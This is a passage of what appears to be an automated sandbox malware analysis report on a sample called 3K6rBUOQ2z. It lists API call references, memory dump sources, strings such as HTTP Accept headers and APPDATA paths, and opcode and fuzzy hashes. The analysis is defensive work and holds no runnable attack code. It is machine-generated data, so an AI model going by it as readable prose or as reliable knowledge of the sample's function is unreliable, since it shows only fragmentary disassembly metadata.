                                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                    • _free.LIBCMT ref: 1000A05C
                                                    • _free.LIBCMT ref: 1000A071
                                                    • _free.LIBCMT ref: 1000A07C
                                                    • _free.LIBCMT ref: 1000A09E
                                                    • _free.LIBCMT ref: 1000A0B1
                                                    • _free.LIBCMT ref: 1000A0BF
                                                    • _free.LIBCMT ref: 1000A0CA
                                                    • _free.LIBCMT ref: 1000A102
                                                    • _free.LIBCMT ref: 1000A109
                                                    • _free.LIBCMT ref: 1000A126
                                                    • _free.LIBCMT ref: 1000A13E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                    • Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
                                                    • Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                    • Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 00417227
                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F00
                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F12
                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F24
                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F36
                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F48
                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F5A
                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F6C
                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F7E
                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F90
                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FA2
                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FB4
                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FC6
                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FD8
                                                    • _free.LIBCMT ref: 0041721C
                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                    • _free.LIBCMT ref: 0041723E
                                                    • _free.LIBCMT ref: 00417253
                                                    • _free.LIBCMT ref: 0041725E
                                                    • _free.LIBCMT ref: 00417280
                                                    • _free.LIBCMT ref: 00417293
                                                    • _free.LIBCMT ref: 004172A1
                                                    • _free.LIBCMT ref: 004172AC
                                                    • _free.LIBCMT ref: 004172E4
                                                    • _free.LIBCMT ref: 004172EB
                                                    • _free.LIBCMT ref: 00417308
                                                    • _free.LIBCMT ref: 00417320
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                                    • Instruction ID: edf7faae9d3bf0885fb7c5c7e3fb72ef0fb286978f56b7ec46c8a8d77fdb3eda
                                                    • Opcode Fuzzy Hash: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                                    • Instruction Fuzzy Hash: A1313D31608204ABEB21AB7AD845BD777F4AF41354F24885BF559D7261EE38ECC1C628
                                                    APIs
                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 04CEA5D8
                                                    • type_info::operator==.LIBVCRUNTIME ref: 04CEA5FA
                                                    • ___TypeMatch.LIBVCRUNTIME ref: 04CEA709
                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 04CEA7DB
                                                    • _UnwindNestedFrames.LIBCMT ref: 04CEA85F
                                                    • CallUnexpected.LIBVCRUNTIME ref: 04CEA87A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 2123188842-393685449
                                                    • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                    • Instruction ID: f1706070d7e07c16339ef952349df60172e4e25346c463a27abe9f38e1578fb9
                                                    • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                    • Instruction Fuzzy Hash: 8AB17C71800209EFDF29DFA6D9809BEBBB6BF04314B14815AE8156B211D732FA52DB91
                                                    APIs
                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 04B4B43F
                                                    • type_info::operator==.LIBVCRUNTIME ref: 04B4B461
                                                    • ___TypeMatch.LIBVCRUNTIME ref: 04B4B570
                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 04B4B642
                                                    • _UnwindNestedFrames.LIBCMT ref: 04B4B6C6
                                                    • CallUnexpected.LIBVCRUNTIME ref: 04B4B6E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 2123188842-393685449
                                                    • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                    • Instruction ID: f958f8c1c06dd8ad2a3a2dda83ddbe627588a88ea3576b8e757bd005fb919053
                                                    • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                    • Instruction Fuzzy Hash: 45B16C71C04209EFDF15DFA8C8809AEB7B5FF88314B14459AEA156B211D730FA51EFA1
                                                    APIs
                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B1D8
                                                    • type_info::operator==.LIBVCRUNTIME ref: 0040B1FA
                                                    • ___TypeMatch.LIBVCRUNTIME ref: 0040B309
                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B3DB
                                                    • _UnwindNestedFrames.LIBCMT ref: 0040B45F
                                                    • CallUnexpected.LIBVCRUNTIME ref: 0040B47A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 2123188842-393685449
                                                    • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                    • Instruction ID: 3d06a1d46c9e927f581abf88e740a03f69e3fad8364d4cdf02b7d05f470413ac
                                                    • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                    • Instruction Fuzzy Hash: DAB15471800209EFCF29DFA5C8819AEB7B5FF14314B14456BE8117B692D338DA61CBDA
                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                    • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                    • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                    • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                    • String ID: APPDATA$TMPDIR
                                                    • API String ID: 1838500112-4048745339
                                                    • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                    • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                                    • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                    • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                    • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                    Strings
                                                    • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                    • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                    • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                    • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: HeadersHttpRequest$H_prolog3_
                                                    • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                    • API String ID: 1254599795-787135837
                                                    • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                    • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                                    • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                    • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                    • Instruction ID: acaa041e7243b144c48e04bfb57c0b5a001fb5848c61560116689d056185857d
                                                    • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                    • Instruction Fuzzy Hash: 9721AB76900108BFDB41EF95CC80DDE7BB9BF08644F01856AF6559B222DB36EA44DB80
                                                    APIs
                                                    • _free.LIBCMT ref: 04B51362
                                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                                    • _free.LIBCMT ref: 04B5136E
                                                    • _free.LIBCMT ref: 04B51379
                                                    • _free.LIBCMT ref: 04B51384
                                                    • _free.LIBCMT ref: 04B5138F
                                                    • _free.LIBCMT ref: 04B5139A
                                                    • _free.LIBCMT ref: 04B513A5
                                                    • _free.LIBCMT ref: 04B513B0
                                                    • _free.LIBCMT ref: 04B513BB
                                                    • _free.LIBCMT ref: 04B513C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                    • Instruction ID: 2a10a7805f43cdd66fb67693c0c57ce734796f275dd78e4ecda33884c6c57685
                                                    • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                    • Instruction Fuzzy Hash: A821B87A90011CFFDB05EF99D880EDDBFB8BF08244B4051A6E9259B171DB31EA54DB80
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                    • Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
                                                    • Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                    • Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91
                                                    APIs
                                                    • _free.LIBCMT ref: 004110FB
                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                    • _free.LIBCMT ref: 00411107
                                                    • _free.LIBCMT ref: 00411112
                                                    • _free.LIBCMT ref: 0041111D
                                                    • _free.LIBCMT ref: 00411128
                                                    • _free.LIBCMT ref: 00411133
                                                    • _free.LIBCMT ref: 0041113E
                                                    • _free.LIBCMT ref: 00411149
                                                    • _free.LIBCMT ref: 00411154
                                                    • _free.LIBCMT ref: 00411162
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                    • Instruction ID: 5835e015de09c4cc1f53331febaa62aeb6779b48f58b4a69f4cd00ff2e5db2ca
                                                    • Opcode Fuzzy Hash: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                    • Instruction Fuzzy Hash: 3D219876900108AFCB41EF95C881DDE7FB9BF48344B0445ABB6199B121EB75DA84CB84
                                                    APIs
                                                    • RtlDecodePointer.NTDLL(?), ref: 0041A622
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: DecodePointer
                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                    • API String ID: 3527080286-3064271455
                                                    • Opcode ID: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                    • Instruction ID: 98f7bf46ea2d04c7b06ac9836e821450726948aa73f1de9436264de5739e925b
                                                    • Opcode Fuzzy Hash: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                    • Instruction Fuzzy Hash: 5651ACB490121ACBDF109FA8E94C1EEBBB0FB05300F554047D4A1A62A5C77CCAF68B5E
                                                    APIs
                                                    • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                    • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                    • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                    • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 2751267872-393685449
                                                    • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                    • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                                    • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                    • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free$___from_strstr_to_strchr
                                                    • String ID:
                                                    • API String ID: 3409252457-0
                                                    • Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                    • Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
                                                    • Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                    • Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51
                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,04B492CD), ref: 04B492FB
                                                    • GetModuleHandleW.KERNEL32(0041DFB8,?,?,04B492CD), ref: 04B49306
                                                    • GetModuleHandleW.KERNEL32(0041DFFC,?,?,04B492CD), ref: 04B49317
                                                    • GetProcAddress.KERNEL32(00000000,0041E018), ref: 04B49329
                                                    • GetProcAddress.KERNEL32(00000000,0041E034), ref: 04B49337
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B492CD), ref: 04B4935A
                                                    • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 04B49376
                                                    • CloseHandle.KERNEL32(0042AF60,?,?,04B492CD), ref: 04B49386
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                    • String ID:
                                                    • API String ID: 2565136772-0
                                                    • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                    • Instruction ID: 096d5d5beab73883d0c31ded6276062fec5c07aa1a4af502f75caaa1d3304148
                                                    • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                    • Instruction Fuzzy Hash: 0B01B5F1F40321ABD7202F74AD09B9B3BA8EBCDB11B594071FD05D21A4DBACD4019A6A
                                                    APIs
                                                    • __RTC_Initialize.LIBCMT ref: 1000291D
                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                    • String ID:
                                                    • API String ID: 2442719207-0
                                                    • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                    • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                    • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                    • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 04CEA017
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 04CEA01F
                                                    • _ValidateLocalCookies.LIBCMT ref: 04CEA0A8
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 04CEA0D3
                                                    • _ValidateLocalCookies.LIBCMT ref: 04CEA128
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 1170836740-1018135373
                                                    • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                    • Instruction ID: 320d9273309d4f661b30fab8b9268647b8c7b7509f23bd977647be4226ea204a
                                                    • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                    • Instruction Fuzzy Hash: 7D41E534A00209EFCF10DF6AC884ABEBBB6AF45328F148055E815AB351D737BA15CB91
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                    • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                    • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 1170836740-1018135373
                                                    • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                    • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                    • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                    • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 0040AC17
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0040AC1F
                                                    • _ValidateLocalCookies.LIBCMT ref: 0040ACA8
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0040ACD3
                                                    • _ValidateLocalCookies.LIBCMT ref: 0040AD28
                                                    Strings
                                                    Memory Dump Source
